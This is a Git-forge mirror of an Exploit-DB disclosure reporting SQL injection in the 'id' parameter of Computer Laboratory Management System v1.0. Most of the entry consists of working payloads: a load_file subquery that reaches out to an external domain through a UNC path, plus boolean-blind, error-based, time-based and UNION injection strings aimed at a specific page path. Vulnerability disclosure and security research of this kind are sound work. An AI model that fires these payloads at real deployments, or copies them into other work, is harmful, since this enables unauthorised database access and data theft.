bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51965.txt
Exploit-DB a06b0db78d DB: 2024-04-04 
6 changes to exploits/shellcodes/ghdb

Computer Laboratory Management System v1.0 - Multiple-SQLi

Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)

Quick CMS v6.7 en 2023 - 'password' SQLi

Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)

ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
2024-04-04 00:16:33 +00:00

48 lines
No EOL
2 KiB
Text
Raw Blame History

# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
# Author: nu11secur1ty
# Date: 03/28/2024
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
# Reference: https://portswigger.net/web-security/sql-injection
# Description:
The id parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
was submitted in the id parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. The attacker can get all information from the system by
using this vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: page=user/manage_user&id=7''' AND (SELECT 1734
FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
---
Reference in a new issue View git blame Copy permalink